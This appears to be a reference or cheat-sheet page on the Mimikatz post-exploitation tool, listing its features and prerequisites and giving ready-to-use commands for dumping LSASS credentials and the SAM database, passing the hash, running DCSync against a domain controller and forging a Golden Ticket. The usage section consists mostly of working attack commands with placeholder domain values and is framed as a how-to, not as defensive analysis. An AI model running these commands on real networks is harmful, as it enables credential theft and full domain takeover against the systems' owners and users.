Overview

Mimikatz is a leading post-exploitation tool written in C by Benjamin Delpy. It is famously known for extracting plaintext passwords, hash, PIN code and kerberos tickets from memory. It can also perform advanced attacks like Pass-the-Hash, Pass-the-Ticket, and building Golden Tickets.

Key Features

Extract credentials stored in LSASS.
Generate Golden and Silver tickets.
Perform Pass-the-Hash (PtH) and Overpass-the-Hash attacks.
Dump LSA secrets and manipulate certificates.
DCSync to pull password hashes directly from the domain controller.

Prerequisites

To extract credentials from memory using LSASS, you must have Local Administrator privileges and SeDebugPrivilege.

Usage Examples

Extracting Credentials (LogonPasswords)

TEXT

                            # Gain Debug privileges and dump passwords
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
                        

Passing the Hash (PtH)

Launch a new process (e.g., cmd.exe) presenting the given NTLM hash rather than requiring the plaintext password.

TEXT

                            mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:target.local /ntlm:1234567890abcdef1234567890abcdef
                        

Dumping the SAM Database (Local Hashes)

Retrieve the hashes of local users from the SAM database.

TEXT

                            mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
                        

DCSync (Domain Hash Extraction)

Simulate a Domain Controller using the DRSUAPI to request password hashes for specific users from the actual Domain Controller. (Requires Domain Admin or equivalent Replicating Directory Changes privileges).

TEXT

                            # Dump the krbtgt hash (essential for Golden Tickets)
mimikatz # lsadump::dcsync /user:target\krbtgt /domain:target.local

# Dump the administrator hash
mimikatz # lsadump::dcsync /user:target\Administrator /domain:target.local
                        

Crafting a Golden Ticket

If you have the krbtgt NTLM hash, you can forge a Kerberos TGT with a 10-year lifespan that will be blindly trusted by the domain.

TEXT

                            # Create and automatically inject the ticket
mimikatz # kerberos::golden /domain:target.local /sid:S-1-5-21-XXX-YYY-ZZZ /rc4:KRBTGT_NTLM_HERE /user:FakeAdmin /id:500 /ptt
                        